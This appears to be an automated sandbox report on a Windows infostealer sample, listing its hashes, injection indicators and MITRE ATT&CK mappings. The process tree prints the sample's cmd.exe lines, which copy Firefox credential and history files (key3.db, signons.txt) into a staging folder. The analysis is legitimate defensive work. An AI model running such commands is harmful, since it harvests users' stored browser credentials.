7b78ae1493693935b410ba9d252d2358bc8a4f11c2cc29bb6429454ef4c7b572

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
19-06-2024 20:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe
Size

391KB
MD5

0049f3e822314897cb98ce47825fa645
SHA1

0e286a6b8f59f1b555facb2604afad39a1433f92
SHA256

7b78ae1493693935b410ba9d252d2358bc8a4f11c2cc29bb6429454ef4c7b572
SHA512

f4f824a77bf317bc2e2927aa590fdbd07b17706ba01ab17b778699b0813439049edbc39a28498c890889bd1d97ee1a1fedc0924a07b9861845ea2680bbbb34ed
SSDEEP

6144:FhOZbxZ+Be8wGKmFTGT6cF6R5m9rBLICY0klFblVVlIG:FyxZ+B5wGKmFTBC6RolZRkBVVln

Score

7^/10

spyware stealer

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4996 set thread context of 2432	4996	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	84

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4996 wrote to memory of 2432	4996	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	84
PID 4996 wrote to memory of 2432	4996	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	84
PID 4996 wrote to memory of 2432	4996	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	84
PID 4996 wrote to memory of 2432	4996	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	84
PID 4996 wrote to memory of 2432	4996	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	84
PID 2432 wrote to memory of 3832	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	85
PID 2432 wrote to memory of 3832	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	85
PID 2432 wrote to memory of 3832	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	85
PID 2432 wrote to memory of 3932	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	89
PID 2432 wrote to memory of 3932	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	89
PID 2432 wrote to memory of 3932	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	89
PID 2432 wrote to memory of 1988	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	90
PID 2432 wrote to memory of 1988	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	90
PID 2432 wrote to memory of 1988	2432	0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe	90

C:\Users\Admin\AppData\Local\Temp\0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4996
- C:\Users\Admin\AppData\Local\Temp\0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe
  C:\Users\Admin\AppData\Local\Temp\0049f3e822314897cb98ce47825fa645_JaffaCakes118.exe
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c %systemdrive% && cd %appdata% && cd Mozilla\Firefox\Profiles && dir /B /O:-D > c:\dateiname.txt
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c md c:\ende
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c %systemdrive% && cd %appdata% && cd Mozilla\Firefox\Profiles && cd rfj66zji.default-release&& copy key3.db c:\ende && copy signons.txt c:\ende && copy history.dat c:\ende
    3⤵
    PID:1988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\dateiname.txt

Filesize
42B

MD5
d500719700aa1c50ff572a28765cc34a

SHA1
d4be75b3e5f55c6e9c0ca5665df7ddeb2104bf61

SHA256
301c455fe7ba9b0b7e0114a320ded1db4f25ae19f62d193df2d7a53a1e6ea24c

SHA512
da45a3c339fb3f17bf064104a4e09023b87cebc3abbdbe12fa0baed9bef5f685ccc29b78c6a318a188fc1bd2fe63a7e4cb38f8b8a2cc7290c58f84a8dec48ba3

Download Submit
memory/2432-1-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2432-6-0x0000000063400000-0x000000006345F000-memory.dmp

Filesize
380KB

Download
memory/2432-4-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2432-11-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4996-0-0x0000000063400000-0x000000006345F000-memory.dmp

Filesize
380KB

Download
memory/4996-5-0x0000000063400000-0x000000006345F000-memory.dmp

Filesize
380KB

Download
memory/4996-3-0x0000000002150000-0x0000000002151000-memory.dmp

Filesize
4KB

Download